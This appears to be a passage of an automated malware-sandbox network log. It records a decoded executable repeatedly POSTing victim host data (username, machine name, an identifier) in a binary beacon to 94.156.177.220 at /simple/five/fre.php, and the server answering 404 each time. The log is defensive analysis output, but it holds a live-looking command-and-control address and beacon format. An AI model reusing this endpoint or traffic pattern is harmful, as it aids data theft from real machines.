                                  Oct 25, 2024 10:20:04.019900084 CEST228INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:03 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 15
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.44973294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:04.087390900 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:04.092936039 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:05.060925961 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:04 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.44973394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:05.225447893 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:05.231107950 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:06.203742981 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:06 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.44973494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:06.367363930 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:06.375575066 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:07.328375101 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.44973594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:07.479399920 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:07.485394001 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:09.431647062 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:08 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.
                                  Oct 25, 2024 10:20:09.432967901 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:08 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.
                                  Oct 25, 2024 10:20:09.433762074 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:08 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.44973694.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:09.590027094 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:09.597187996 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:10.553689957 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:10 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.44973794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:10.709742069 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:10.715159893 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:11.671643019 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:11 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.44973894.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:12.304312944 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:12.310127020 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:13.293423891 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:13 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.44973994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:13.446667910 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:13.452611923 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:14.398870945 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:14 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.44974094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:14.587332964 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:14.593029022 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:15.567843914 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:15 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.44974194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:15.746071100 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:15.751616955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:16.716876984 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:16 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.44974494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:16.867280006 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:16.872788906 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:17.832015991 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:17 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.44974794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:18.199476957 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:18.205156088 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:19.151099920 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:19 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.44974994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:19.303529024 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:19.310463905 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:21.110606909 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:20 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.
                                  Oct 25, 2024 10:20:21.113428116 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:20 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.
                                  Oct 25, 2024 10:20:21.363428116 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:20 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.44975194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:21.374851942 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:21.380407095 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:22.348746061 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:22 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.44975294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:22.543530941 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:22.549457073 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:23.506381989 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:23 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.44975394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:23.678324938 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:23.684072971 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:24.651226044 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:24 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.44975494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:20:24.811218977 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:20:24.816659927 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:20:25.785826921 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:20:25 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
